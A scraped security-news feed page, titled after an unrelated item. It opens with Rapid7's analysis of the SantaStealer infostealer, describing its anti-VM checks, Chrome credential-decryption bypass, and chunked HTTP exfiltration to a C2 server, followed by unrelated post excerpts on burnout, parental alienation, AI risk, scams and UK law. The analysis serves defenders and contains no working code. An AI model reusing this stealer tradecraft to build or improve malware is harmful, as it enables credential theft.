Google to Shut Down Dark Web Monitoring Tool in February 2026
Rapid7 Labs has identified a new malware-as-a-service information stealer being actively promoted through Telegram channels and on underground hacker forums. The stealer is advertised under the name “SantaStealer” and is planned to be released before the end of 2025. Open source intelligence suggests that it recently underwent a rebranding from the name “BluelineStealer.”
The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection. Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP.
While the stealer is advertised as “fully written in C”, featuring a “custom C polymorphic engine” and being “fully undetected,” Rapid7 has found unobfuscated and unstripped SantaStealer samples that allow for an in-depth analysis. These samples can shed more light on this malware’s true level of sophistication.
In early December 2025, Rapid7 identified a Windows executable triggering a generic infostealer detection rule, which we usually see triggered by samples from the Raccoon stealer family. Initial inspection of the sample (SHA-256 beginning with 1a27…) revealed a 64-bit DLL with over 500 exported symbols (all bearing highly descriptive names such as “payload_main”, “check_antivm” or “browser_names”) and a plethora of unencrypted strings that clearly hinted at credential-stealing capabilities.
While it is not clear why the malware authors chose to build a DLL, or how the stealer payload was to be invoked by a potential stager, this choice had the (presumably unintended) effect of including the name of every single function and global variable not declared as static in the executable’s export directory. Even better, this includes symbols from statically linked libraries, which we can thus identify with minimal effort.
The statically linked libraries in this particular DLL include:
Another pair of exported symbols in the DLL are named notes_config_size and notes_config_data. These point to a string containing the JSON-encoded stealer configuration, which contains, among other things, a banner (“watermark”) with Unicode art spelling “SANTA STEALER” and a link to the stealer Telegram channel, t[.]me/SantaStealer.

Figure 1: A preview of the stealer’s configuration

Figure 2: A Telegram message from November 25th advertising the rebranded SantaStealer

Figure 3: A Telegram message announcing the rebranding and expected release schedule
Visiting SantaStealer’s Telegram channel, we observed the affiliate web panel, where we were able to register an account and access more information provided by the operators, such as a list of features, the pricing model, or the various build configuration options. This allowed us to cross-correlate information from the panel with the configuration observed in samples, and get a basic idea of the ongoing evolution of the stealer.
Apart from Telegram, the stealer can be found advertised also on the Lolz hacker forum at lolz[.]live/santa/. The use of this Russian-speaking forum, the top-level domain name of the web panel bearing the country code of the Soviet Union (su), and the ability to configure the stealer not to target Russian-speaking victims (described later) hints at Russian citizenship of the operators — not at all unusual on the infostealer market.

Figure 4: A list of features advertised in the web panel
As the above screenshot illustrates, the stealer operators have ambitious plans, boasting anti-analysis techniques, antivirus software bypasses, and deployment in government agencies or complex corporate networks. This is reflected in the pricing model, where a basic variant is advertised for $175 per month, and a premium variant is valued at $300 per month, as captured in the following screenshot.

Figure 5: Pricing model for SantaStealer (web panel)
In contrast to these claims, the samples we have seen until now are far from undetectable, or in any way difficult to analyze. While it is possible that the threat actor behind SantaStealer is still developing some of the mentioned anti-analysis or anti-AV techniques, having samples leaked before the malware is ready for production use — complete with symbol names and unencrypted strings — is a clumsy mistake likely thwarting much of the effort put into its development and hinting at poor operational security of the threat actor(s).
Interestingly, the web panel includes functionality to “scan files for malware” (i.e. check whether a file is being detected or not). While the panel assures the affiliate user that no files are shared and full anonymity is guaranteed, one may have doubts about whether this is truly the case.

Figure 6: Web panel allows to scan files for malware.
Some of the build configuration options within the web panel are shown in Figures 7 through 9.

Figure 7: SantaStealer build configuration

Figure 8: More SantaStealer build configuration options

Figure 9: SantaStealer build configuration options, including CIS countries detection
One final aspect worth pointing out is that, rather unusually, the decision whether to target countries in the Commonwealth of Independent States (CIS) is seemingly left up to the buyer and is not hardcoded, as is often the case with commercial infostealers.
Having read the advertisement of SantaStealer’s capabilities by the developers, one might be interested in seeing how they are implemented on a technical level. Here, we will explore one of the EXE samples (SHA-256 beginning with 926a…), as attempts at executing the DLL builds with rundll32.exe ran into issues with the C runtime initialization. However, the DLL builds (such as SHA-256 beginning with 1a27…) are still useful for static analysis and cross-referencing with the EXE.
At the moment, detecting and tracking these payloads is straightforward, due to the fact that both the malware configuration and the C2 server IP address are embedded in the executable in plain text. However, if SantaStealer indeed does turn out to be competitive and implements some form of encryption, obfuscation, or anti-analysis techniques (as seen with Lumma or Vidar) these tasks may become less trivial for the analyst. A deeper understanding of the patterns and methods utilized by SantaStealer may be beneficial.

Figure 10: Code in the send_upload_chunk exported function references plaintext strings
The user-defined entry point in the executable corresponds to the payload_main DLL export. Within this function, the stealer first checks the anti_cis and exec_delay_seconds values from the embedded config and behaves accordingly. If the CIS check is enabled and a Russian keyboard layout is detected using the GetKeyboardLayoutList API, the stealer drops an empty file named “CIS” and ends its execution. Otherwise, SantaStealer waits for the configured number of seconds before calling functions named check_antivm, payload_credentials, create_memory_based_log and creating a thread running the routine named ThreadPayload1 in the DLL exports.
The anti-VM function is self-explanatory, but its implementation differs across samples, hinting at the ongoing development of the stealer. One sample checks for blacklisted processes (by hashing the names of running process executables using a custom rolling checksum and searching for them in a blacklist), suspicious computer names (using the same method) and an “analysis environment,” which is just a hard-coded blacklist of working directories, like “C:\analysis” and similar. Another sample checks the number of running processes, the system uptime, the presence of a VirtualBox service (by means of a call to OpenServiceA with "VBoxGuest") and finally performs a time-based debugger check. In either case, if a VM or debugger is detected, the stealer ends its execution.
Next, payload_credentials attempts to steal browser credentials, including passwords, cookies, and saved credit cards. For Chromium-based browsers, this involves bypassing a mechanism known as AppBound Encryption (ABE). For this purpose, SantaStealer embeds an additional executable, either as a resource or directly in section data, which is either dropped to disk and executed (screenshot below), or loaded and executed in-memory, depending on the sample.

Figure 11: Execution of an embedded executable specialized in browser hijacking
The extracted executable, in turn, contains an encrypted DLL in its resources, which is decrypted using two consecutive invocations of ChaCha20 with two distinct pairs of 32-byte key and 12-byte nonce. This DLL exports functions called ChromeElevator_Initialize, ChromeElevator_ProcessAllBrowsers and ChromeElevator_Cleanup, which are called by the executable in that order. Based on the symbol naming, as well as usage of ChaCha20 encryption for obfuscation and presence of many recognizable strings, we assess with moderate confidence that this executable and DLL are heavily based on code from the "ChromElevator" project (https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption), which employs direct syscall-based reflective process hollowing to inject code into the target browser. Hijacking the security context of a legitimate browser process this way allows the attacker to decrypt AppBound encryption keys and thereby decrypt stored credentials.

Figure 12: The embedded EXE decrypts and loads a DLL in-memory and calls its exports.
The next function called from main, create_memory_based_log, demonstrates the modular design of the stealer. For each included module, it creates a thread running the module_thread routine with an incremented numerical ID for that module, starting at 0. It then waits for 45 seconds before joining all thread handles and writing all files collected in-memory into a ZIP file named “Log.zip” in the TEMP directory.
The module_thread routine simply takes the index it was passed as parameter and calls a handler function at that index in a global table, for some reason called memory_generators in the DLL. The module function takes only a single output parameter, which is the number of files it collected. In the so helpfully annotated DLL build, we can see 14 different modules. Besides generic modules for reading environment variables, taking screenshots, or grabbing documents and notes, there are specialized modules for stealing data from the Telegram desktop application, Discord, Steam, as well as browser extensions, histories and passwords.

Figure 13: A list of named module functions in a SantaStealer sample
Finally, after all the files have been collected, ThreadPayload1 is run in a thread. It sleeps for 15 seconds and then calls payload_send, which in turn calls send_zip_from_memory_0, which splits the ZIP into 10 MB chunks that are uploaded using send_upload_chunk.
The file chunks are exfiltrated over plain HTTP to an /upload endpoint on a hard-coded C2 IP address on port 6767, with only a couple special headers:
User-Agent: upload Content-Type: multipart/form-data; boundary=----WebKitFormBoundary[...] auth: [...] w: [...] complete: true (only on final request)
The auth header appears to be a unique build ID, and w is likely the optional “tag” used to distinguish between campaigns or “traffic sources”, as is mentioned in the features.
The SantaStealer malware is in active development, set to release sometime in the remainder of this month or in early 2026. Our analysis of the leaked builds reveals a modular, multi-threaded design fitting the developers’ description. Some, but not all, of the improvements described in SantaStealer’s Telegram channel are reflected in the samples we were able to analyze. For one, the malware can be seen shifting to a completely fileless collection approach, with modules and the Chrome decryptor DLL being loaded and executed in-memory. On the other hand, the anti-analysis and stealth capabilities of the stealer advertised in the web panel remain very basic and amateurish, with only the third-party Chrome decryptor payload being somewhat hidden.
To avoid getting infected with SantaStealer, it is recommended to pay attention to unrecognized links and e-mail attachments. Watch out for fake human verification, or technical support instructions, asking you to run commands on your computer. Finally, avoid running any kind of unverified code from sources such as pirated software, videogame cheats, unverified plugins, and extensions.
Stay safe and off the naughty list!
Customers using Rapid7’s Intelligence Hub gain direct access to SantaStealer IOCs, along with ongoing intelligence on new activity and related campaigns. The platform also has detections for a wide range of other infostealers, including Lumma, StealC, RedLine, and more, giving security teams broader visibility into emerging threats.
SantaStealer DLLs with exported symbols (SHA-256)
SantaStealer EXEs (SHA-256)
SantaStealer C2s
MITRE ATT&CK

You’ve spent weeks, maybe months, crafting your dream Electron app. The UI looks clean, the features work flawlessly, and you finally hit that Build button. Excited, you send the installer to your friend for testing. You’re expecting a “Wow, this is awesome!” Instead, you get: Windows protected your PC. Unknown Publisher.” That bright blue SmartScreen… Read More How to Sign a Windows App with Electron Builder?
The post How to Sign a Windows App with Electron Builder? appeared first on SignMyCode - Resources.
The post How to Sign a Windows App with Electron Builder? appeared first on Security Boulevard.
Explore how AI-driven threat detection can secure Model Context Protocol (MCP) deployments from data manipulation attempts, with a focus on post-quantum security.
The post AI-powered threat detection for MCP data manipulation attempts appeared first on Security Boulevard.
How a simple “I found your photo” message can quietly take over your account
The post The WhatsApp takeover scam that doesn’t need your password appeared first on Security Boulevard.
There's a strange thing that happens when a person you once knew as your child seems, over years, to forget the sound of your voice, the feel of your laugh, or the way your presence once grounded them. It isnt just loss - it's an internal inversion: your love becomes a shadow. Something haunting, familiar, yet painful to face.
I know this because I lived it - decade after decade - as the father of two sons, now ages 28 and 26. What has stayed with me isn't just the external stripping away of connection, but the internal fracture it caused in myself.
Some days I felt like the person I was before alienation didn't exist anymore. Not because I lost my identity, but because I was forced to confront parts of myself I never knew were there - deep fears, hidden hopes, unexamined beliefs about love, worth, and attachment.
This isn't a story of blame. It's a story of honesty with the inner terrain - the emotional geography that alienation carved into my heart.
Love doesn't disappear when a child's affection is withdrawn. Instead, it changes shape. It becomes more subtle, less spoken, but no less alive.
When your kids are little, love shows up in bedtime stories, laughter, scraped knees, and easy smiles. When they're adults and distant, love shows up in the quiet hurt - the way you notice an empty chair, or a text that never came, or the echo of a memory that still makes your heart ache.
This kind of love doesn't vanish. It becomes a quiet force pulling you inward - toward reflection instead of reaction, toward steadiness instead of collapse.
There's a psychological reality at play here that goes beyond custody schedules, angry words, or fractured holidays. When a person - especially a young person - bonds with one attachment figure and rejects another, something profound is happening in the architecture of their emotional brain.
In some dynamics of parental influence, children form a hyper‑focused attachment to one caregiver and turn away from the other. That pattern isn't about rational choice but emotional survival. Attachment drives us to protect what feels safe and to fear what feels unsafe - even when the fear isn't grounded in reality. High Conflict Institute
When my sons leaned with all their emotional weight toward their mother - even to the point of believing impossible things about me - it was never just "obedience." It was attachment in overdrive: a neural pull toward what felt like safety, acceptance, or approval. And when that sense of safety was threatened by even a hint of disapproval, the defensive system in their psyche kicked into high gear.
This isn't a moral judgment. It's the brain trying to survive.
Here's the part no one talks about in polite conversation:
You can love someone deeply and grieve their absence just as deeply - at the same time.
It's one of the paradoxes that stays with you long after the world expects you to "move on."
You can hope that the door will open someday
and you can also acknowledge it may never open in this lifetime.
You can forgive the emotional wounds that were inflicted
and also mourn the lost years that you'll never get back.
You can love someone unconditionally
and still refuse to let that love turn into self‑erosion.
This tension - this bittersweet coexistence - becomes a part of your inner life.
This is where the real work lives.
When children grow up in an environment where one caregiver's approval feels like survival, the attachment system can begin to over‑regulate itself. Instead of trust being distributed across relationships, it narrows. The safe figure becomes everything. The other becomes threatening by association, even when there's no rational basis for fear. Men and Families
For my sons, that meant years of believing narratives that didn't fit reality - like refusing to consider documented proof of child support, or assigning malicious intent to benign situations. When confronted with facts, they didn't question the narrative - they rationalized it to preserve the internal emotional logic they had built around attachment and fear.
That's not weakness. That's how emotional survival systems work.
One of the hardest lessons is learning to hold ambivalence without distortion. In healthy relational development, people can feel both love and disappointment, both closeness and distance, both gratitude and grief - all without collapsing into one extreme or the other.
But in severe attachment distortion, the emotional brain tries to eliminate complexity - because complexity feels dangerous. It feels unstable. It feels like uncertainty. And the emotional brain prefers certainty, even if that certainty is painful. Karen Woodall
Learning to tolerate ambiguity - that strange space where love and loss coexist - becomes a form of inner strength.
I write this not to indict, accuse, or vilify anyone. The human psyche is far more complicated than simple cause‑and‑effect. What I've learned - through years of quiet reflection - is that:
Attachment wounds run deep, and they can overshadow logic and memory.
People don't reject love lightly. They reject fear and threat.
Healing isn't an event. It's a series of small acts of awareness and presence.
Your internal world is the only place you can truly govern. External reality is negotiable - inner life is not.
I have a quiet hope - not a loud demand - that one day my sons will look back and see the patterns that were invisible to them before. Not to blame. Not to re‑assign guilt. But to understand.
Hope isn't a promise. It's a stance of openness - a willingness to stay emotionally available without collapsing into desperation.
Healing isn't about winning back what was lost. It's about cultivating a life that holds the loss with compassion and still knows how to turn toward joy when it appears - quietly, softly, unexpectedly.
Your heart doesn't have to choose between love and grief. It can carry both.
And in that carrying, something deeper begins to grow.
#
Parental Alienation & Emotional Impact
International Society for the New Definition of Abuse & Family Violence - overview on parental alienation as child abuse: https://isnaf.info/our-mission-2/
Research on adult impacts of alienating behaviours (mental health, trauma, identity): https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9026878/
Attachment & Alienation Theory
Attachment and alienation discussion from High Conflict Institute: https://www.highconflictinstitute.com/attachment-and-alienation/
Attachment‑based model of parental alienation (PDF overview): https://menandfamilies.org/wp-content/uploads/2021/10/An-Attachment-Based-Model-of-Parental-Alienation-Foundations.pdf
General Parental Alienation Background
Wikipedia on parental alienation (neutral background): https://en.wikipedia.org/wiki/Parental_alienation
The post When Love Becomes a Shadow: The Inner Journey After Parental Alienation appeared first on Security Boulevard.
In cybersecurity, being “always on” is often treated like a badge of honor.
We celebrate the leaders who respond at all hours, who jump into every incident, who never seem to unplug. Availability gets confused with commitment. Urgency gets mistaken for effectiveness. And somewhere along the way, exhaustion becomes normalized—if not quietly admired.
But here’s the uncomfortable truth:
Always-on leadership doesn’t scale. And over time, it becomes a liability.
I’ve seen it firsthand, and if you’ve spent any real time in high-pressure security environments, you probably have too.
The Myth of Constant Availability
Cybersecurity is unforgiving. Threats don’t wait for business hours. Incidents don’t respect calendars. That reality creates a subtle but dangerous expectation: real leaders are always reachable.
The problem isn’t short-term intensity. The problem is when intensity becomes an identity.
When leaders feel compelled to be everywhere, all the time, a few things start to happen:
Decision quality quietly degrades
Teams become dependent instead of empowered
Strategic thinking gets crowded out by reactive work
From the outside, it can look like dedication. From the inside, it often feels like survival mode.
And survival mode is a terrible place to lead from.
Burnout isn’t just about being tired. It’s about losing margin—mental, emotional, and strategic margin.
Leaders without margin:
Default to familiar solutions instead of better ones
React instead of anticipate
Solve today’s problem at the expense of tomorrow’s resilience
In cybersecurity, that’s especially dangerous. This field demands clarity under pressure, judgment amid noise, and the ability to zoom out when everything is screaming “zoom in.”
When leaders are depleted, those skills are the first to go.
One of the biggest mindset shifts I’ve seen in effective leaders is this:
They stop trying to be the system and start building one.
That means:
Creating clear decision boundaries so teams don’t need constant escalation
Trusting people with ownership, not just tasks
Designing escalation paths that protect focus instead of destroying it
This isn’t about disengaging. It’s about leading intentionally.
Ironically, the leaders who are least available at all times are often the ones whose teams perform best—because the system works even when they step away.
There’s a difference between being reachable and being present.
Presence is about:
Showing up fully when it matters
Making thoughtful decisions instead of fast ones
Modeling sustainable behavior for teams that are already under pressure
When leaders never disconnect, they send a message—even if unintentionally—that rest is optional and boundaries are weakness. Over time, that culture burns people out long before the threat landscape does.
Good leaders protect their teams.
Great leaders also protect their own capacity to lead.
In a field obsessed with uptime, response times, and coverage, it’s worth asking a harder question:
If I stepped away for a week, would things fall apart—or function as designed?
If the answer is “fall apart,” that’s not a personal failure. It’s a leadership signal. One that points to opportunity, not inadequacy.
The strongest leaders I know aren’t always on.
They’re intentional. They’re disciplined. And they understand that long-term effectiveness requires more than endurance—it requires self-mastery.
In cybersecurity especially, that might be the most underrated leadership skill of all.
World Health Organization (WHO) — Burn-out an “occupational phenomenon” (ICD-11 overview)
https://www.who.int/news/item/28-05-2019-burn-out-an-occupational-phenomenon-international-classification-of-diseases
World Health Organization (WHO) — Burn-out: an occupational phenomenon (FAQ / definition)
https://www.who.int/standards/classifications/frequently-asked-questions/burn-out-an-occupational-phenomenon
Harvard Business Review — When You’re the Executive Everyone Relies On—and You’re Burning Out (Oct 9, 2025)
https://hbr.org/2025/10/when-youre-the-executive-everyone-relies-on-and-youre-burning-out
Harvard Business Review — Preventing Burnout Is About Empathetic Leadership (Sep 28, 2020)
https://hbr.org/2020/09/preventing-burnout-is-about-empathetic-leadership
Google Site Reliability Engineering (SRE Book) — Eliminating Toil
https://sre.google/sre-book/eliminating-toil/
Google SRE Workbook — Eliminating Toil (operational efficiency)
https://sre.google/workbook/eliminating-toil/
NIST — SP 800-61r3 (PDF): Incident Response Recommendations and Considerations for Cybersecurity Risk Management (CSF 2.0 Community Profile)
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r3.pdf
NIST CSRC — SP 800-61r3 publication landing page
https://csrc.nist.gov/pubs/sp/800/61/r3/ipd
NIST News — NIST Revises SP 800-61 (incident response recommendations)
https://www.nist.gov/news-events/news/2025/04/nist-revises-sp-800-61-incident-response-recommendations-and-considerations
CDC / NIOSH — Stress…At Work (NIOSH Publication No. 99-101)
https://www.cdc.gov/niosh/docs/99-101/default.html
OSHA — Workplace Stress: Guidance and Tips for Employers
https://www.osha.gov/workplace-stress/employer-guidance
Mind Garden — Maslach Burnout Inventory (MBI) (official distributor page)
https://www.mindgarden.com/117-maslach-burnout-inventory-mbi
Training Industry — Developing Conscious Leaders for a Fast-Changing World
https://trainingindustry.com/articles/leadership/developing-conscious-leaders-for-a-fast-changing-world/
The post The Burnout Nobody Talks About: When “Always-On” Leadership Becomes a Liability appeared first on Security Boulevard.
How Do Non-Human Identities Transform Cloud Security Management? Could your cloud security management strategy be missing a vital component? With cybersecurity evolves, the focus has expanded beyond traditional human operatives to encompass Non-Human Identities (NHIs). Understanding NHIs and their role in modern cloud environments is crucial for industries ranging from financial services to healthcare. This […]
The post How does Agentic AI affect compliance in the cloud appeared first on Entro.
The post How does Agentic AI affect compliance in the cloud appeared first on Security Boulevard.
How Do Non-Human Identities Impact Cybersecurity? What role do Non-Human Identities (NHIs) play cybersecurity risks? Where machine-to-machine interactions are burgeoning, understanding NHIs becomes critical for any organization aiming to secure its cloud environments effectively. Decoding Non-Human Identities in the Cybersecurity Sphere Non-Human Identities are the machine identities that enable vast numbers of applications, services, and […]
The post What risks do NHIs pose in cybersecurity appeared first on Entro.
The post What risks do NHIs pose in cybersecurity appeared first on Security Boulevard.
Is Your Organization Prepared for the Evolving Landscape of Non-Human Identities? Managing non-human identities (NHIs) has become a critical focal point for organizations, especially for those using cloud-based platforms. But how can businesses ensure they are adequately protected against the evolving threats targeting machine identities? The answer lies in adopting a strategic and comprehensive approach […]
The post How Agentic AI shapes the future of travel industry security appeared first on Entro.
The post How Agentic AI shapes the future of travel industry security appeared first on Security Boulevard.
The Digital Operational Resilience Act (DORA) is now in full effect, and financial institutions across the EU face mounting pressure to demonstrate robust ICT risk management and cyber resilience. With...
The post DORA Compliance Checklist for Cybersecurity appeared first on Security Boulevard.
Official AppOmni Company Information AppOmni delivers continuous SaaS security posture management, threat detection, and vital security insights into SaaS applications. Uncover hidden risks, prevent data exposure, and gain total control over your SaaS environments with an all-in-one platform. AppOmni Overview Mission: AppOmni’s mission is to prevent SaaS data breaches by securing the applications that power […]
The post Official AppOmni Company Information appeared first on AppOmni.
The post Official AppOmni Company Information appeared first on Security Boulevard.
Amazon Web Services (AWS) today published a report detailing a series of cyberattacks occurring over multiple years attributable to Russia’s Main Intelligence Directorate (GRU) that were aimed primarily at the energy sector in North America, Europe and the Middle East. The latest Amazon Threat Intelligence report concludes that the cyberattacks have been evolving since 2021,..
The post AWS Report Links Multi-Year Effort to Compromise Cloud Services to Russia appeared first on Security Boulevard.
“Start by doing what’s necessary; then do what’s possible; and suddenly you are doing the impossible.” – St. Francis of Assisi In the 12th century, St. Francis wasn’t talking about digital systems, but his advice remains startlingly relevant for today’s AI governance challenges. Enterprises are suddenly full of AI agents such as copilots embedded in …
The post Your AI Agents Aren’t Hidden. They’re Ungoverned. It’s time to Act appeared first on Security Boulevard.
State, Local, Tribal, and Territorial (SLTT) governments operate the systems that keep American society functioning: 911 dispatch centers, water treatment plants, transportation networks, court systems, and public benefits portals. When these digital systems are compromised, the impact is immediate and physical. Citizens cannot call for help, renew licenses, access healthcare, or receive social services. Yet
The post The State of U.S. State and Local Government Cybersecurity (2024-2025): Why Unified AI Defense Is Now Essential appeared first on Seceon Inc.
The post The State of U.S. State and Local Government Cybersecurity (2024-2025): Why Unified AI Defense Is Now Essential appeared first on Security Boulevard.
A data breach of credit reporting and ID verification services firm 700Credit affected 5.6 million people, allowing hackers to steal personal information of customers of the firm's client companies. 700Credit executives said the breach happened after bad actors compromised the system of a partner company.
The post Hackers Steal Personal Data in 700Credit Breach Affecting 5.6 Million appeared first on Security Boulevard.
ServiceNow Inc. is in advanced talks to acquire cybersecurity startup Armis in a deal that could reach $7 billion, its largest ever, according to reports. Bloomberg News first reported the discussions over the weekend, noting that an announcement could come within days. However, sources cautioned that the deal could still collapse or attract competing bidders...
The post ServiceNow in Advanced Talks to Acquire Armis for $7 Billion: Reports appeared first on Security Boulevard.
Session 6A: LLM Privacy and Usable Privacy
Authors, Creators & Presenters: Xiaoyuan Wu (Carnegie Mellon University), Lydia Hu (Carnegie Mellon University), Eric Zeng (Carnegie Mellon University), Hana Habib (Carnegie Mellon University), Lujo Bauer (Carnegie Mellon University)
PAPER
Transparency or Information Overload? Evaluating Users' Comprehension and Perceptions of the iOS App Privacy Report
Apple's App Privacy Report, released in 2021, aims to inform iOS users about apps' access to their data and sensors (e.g., contacts, camera) and, unlike other privacy dashboards, what domains are contacted by apps and websites. To evaluate the effectiveness of the privacy report, we conducted semi-structured interviews to examine users' reactions to the information, their understanding of relevant privacy implications, and how they might change their behavior to address privacy concerns. Participants easily understood which apps accessed data and sensors at certain times on their phones, and knew how to remove an app's permissions in case of unexpected access. In contrast, participants had difficulty understanding apps' and websites' network activities. They were confused about how and why network activities occurred, overwhelmed by the number of domains their apps contacted, and uncertain about what remedial actions they could take against potential privacy threats. While the privacy report and similar tools can increase transparency by presenting users with details about how their data is handled, we recommend providing more interpretation or aggregation of technical details, such as the purpose of contacting domains, to help users make informed decisions.
ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.
Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSS Symposium 2025 Conference content on the Organizations' YouTube Channel.
The post NDSS 2025 – Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report appeared first on Security Boulevard.
Your employees are using AI whether you’ve sanctioned it or not. And even if you’ve carefully vetted and approved an enterprise-grade AI platform, you’re still at risk of attacks and data leakage.
Security leaders are grappling with three types of risks from sanctioned and unsanctioned AI tools. First, there’s shadow AI, all those AI tools that employees use without the approval or knowledge of IT. Then there are the risks that come with sanctioned platforms and agents. If those weren’t enough, you still have to prevent the exposure of sensitive information.
The prevalence of AI use in the workplace is clear: a recent survey by CybSafe and the National Cybersecurity Alliance shows that 65% of respondents are using AI. More than four in 10 (43%) admit to sharing sensitive information with AI tools without their employer’s knowledge. If you haven’t already implemented an AI acceptable use policy, it’s time to get moving. An AI acceptable use policy is an important first step in addressing shadow AI, risky platforms and agents, and data leakage. Let’s dig into each of these three risks and the steps you can take to protect your organization.
The key risks: Each unsanctioned shadow AI tool represents an unmanaged element of your attack surface, where data can leak or threats can enter. For security teams, shadow AI expands the organization's attack surface with unvetted tools, vulnerabilities, and integrations that existing security controls can’t see. The result? You can’t govern AI use. You can try to block it. But, as we’ve learned from other shadow IT trends, you really can’t stop it. So, how can you reduce risk while meeting the needs of the business?
The key risks: Good AI governance means moving users from risky shadow AI to sanctioned enterprise environments. But sanctioned or not, AI platforms introduce unique risks. Threat actors can use sophisticated techniques like prompt injection to trick the tool into ignoring its guardrails. They might employ model manipulation to poison the underlying LLM model and cause exfiltration of private data. In addition, the tools themselves can raise issues related to data privacy, data residency, insecure data sharing, and bias. Knowing what to look for in an enterprise-grade AI vendor is the first step.
The key risks: Even if you’ve done your best to educate employees about shadow AI and performed your due diligence in choosing enterprise AI tools to sanction for use, data leakage remains a risk. Two common pathways for data leakage are:
When your employees adopt AI, you don't have to choose between innovation and security. The unified exposure management approach of Tenable One allows you to discover all AI use with Tenable AI Aware and then protect your sensitive data with Tenable AI Exposure. This combination gives you visibility and enables you to manage your attack surface while safely embracing the power of AI.
Let’s briefly explore how these solutions can help you across the areas we covered in this post:
Unsanctioned AI usage across your organization creates an unmanaged attack surface and a massive blind spot for your security team. Tenable AI Aware can discover all sanctioned and unsanctioned AI usage across your organization. Tenable AI Exposure gives your security teams visibility into the sensitive data that’s exposed so you can enforce policies and control AI-related risks.
Threat actors use sophisticated techniques like prompt injection to trick sanctioned AI platforms into ignoring their guardrails. The prompt-level visibility and real-time analysis you get with Tenable AI Exposure can pinpoint these novel attacks and score their severity, enabling your security team to prioritize and remediate the most critical exposure pathways within your enterprise environment. In addition, AI Exposure helps you uncover AI misconfiguration that could allow connections to an unvetted third-party tool or unintentionally make an agent meant only for internal use publicly available. Fixing such misconfigurations reduces the risks of data leaks and exfiltration.
The static, rule-based approach of traditional data loss prevention (DLP) tools can’t manage non-deterministic AI outputs or novel attacks, which leaves gaps through which sensitive information can exit your organization. Tenable AI Exposure fills these gaps by monitoring AI interactions and workflows. It uses a number of machine learning and deep learning AI models to learn about new attack techniques based on the semantic and policy-violating intent of the interaction, not just simple keywords. This can then help inform other blocking solutions as part of your mitigation actions. For a deeper look at the challenges of preventing data leakage, read [add blog title, URL when ready].
![]()
The post Security for AI: How Shadow AI, Platform Risks, and Data Leakage Leave Your Organization Exposed appeared first on Security Boulevard.
Campus Technology & THE Journal Name Cloud Monitor as Winner in the Cybersecurity Risk Management Category BOULDER, Colo.—December 15, 2025—ManagedMethods, the leading provider of cybersecurity, safety, web filtering, and classroom management solutions for K-12 schools, is pleased to announce that Cloud Monitor has won in this year’s Campus Technology & THE Journal 2025 Product of ...
The post Cloud Monitor Wins Cybersecurity Product of the Year 2025 appeared first on ManagedMethods Cybersecurity, Safety & Compliance for K-12.
The post Cloud Monitor Wins Cybersecurity Product of the Year 2025 appeared first on Security Boulevard.
This week on the Lock and Code podcast…
This is the story of the world’s worst scam and how it is being used to fuel entire underground economies that have the power to rival nation-states across the globe. This is the story of “pig butchering.”
“Pig butchering” is a violent term that is used to describe a growing type of online investment scam that has ruined the lives of countless victims all across the world. No age group is spared, nearly no country is untouched, and, if the numbers are true, with more than $6.5 billion stolen in 2024 alone, no scam might be more serious today, than this.
Despite this severity, like many types of online fraud today, most pig-butchering scams start with a simple “hello.”
Sent through text or as a direct message on social media platforms like X, Facebook, Instagram, or elsewhere, these initial communications are often framed as simple mistakes—a kind stranger was given your number by accident, and if you reply, you’re given a kind apology and a simple lure: “You seem like such a kind person… where are you from?”
Here, the scam has already begun. Pig butchers, like romance scammers, build emotional connections with their victims. For months, their messages focus on everyday life, from family to children to marriage to work.
But, with time, once the scammer believes they’ve gained the trust of their victim, they launch their attack: An investment “opportunity.”
Pig butchers tell their victims that they’ve personally struck it rich by investing in cryptocurrency, and they want to share the wealth. Here, the scammers will lead their victims through opening an entirely bogus investment account, which is made to look real through sham websites that are littered with convincing tickers, snazzy analytics, and eye-popping financial returns.
When the victims “invest” in these accounts, they’re actually giving money directly to their scammers. But when the victims log into their online “accounts,” they see their money growing and growing, which convinces many of them to invest even more, perhaps even until their life savings are drained.
This charade goes on as long as possible until the victims learn the truth and the scammers disappear. The continued theft from these victims is where “pig-butchering” gets its name—with scammers fattening up their victims before slaughter.
Today, on the Lock and Code podcast with host David Ruiz, we speak with Erin West, founder of Operation Shamrock and former Deputy District Attorney of Santa Clara County, about pig butchering scams, the failures of major platforms like Meta to stop them, and why this global crisis represents far more than just a few lost dollars.
“It’s really the most compelling, horrific, humanitarian global crisis that is happening in the world today.”
Tune in today to listen to the full conversation.
Show notes and credits:
Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)
Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.
Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.
Since the Online Safety Act took effect in late July, UK internet users have made it very clear to their politicians that they do not want anything to do with this censorship regime. Just days after age checks came into effect, VPN apps became the most downloaded on Apple's App Store in the UK, and a petition calling for the repeal of the Online Safety Act (OSA) hit over 400,000 signatures.
In the months since, more than 550,000 people have petitioned Parliament to repeal or reform the Online Safety Act, making it one of the largest public expressions of concern about a UK digital law in recent history. The OSA has galvanized swathes of the UK population, and it’s high time for politicians to take that seriously.
Last week, EFF joined Open Rights Group, Big Brother Watch, and Index on Censorship in sending a briefing to UK politicians urging them to listen to their constituents and repeal the Online Safety Act ahead of this week’s Parliamentary petition debate on 15 December.
The legislation is a threat to user privacy, restricts free expression by arbitrating speech online, exposes users to algorithmic discrimination through face checks, and effectively blocks millions of people without a personal device or form of ID from accessing the internet. The briefing highlights how, in the months since the OSA came into effect, we have seen the legislation:
Our briefing continues:
“Those raising concerns about the Online Safety Act are not opposing child safety. They are asking for a law that does both: protects children and respects fundamental rights, including children’s own freedom of expression rights.”
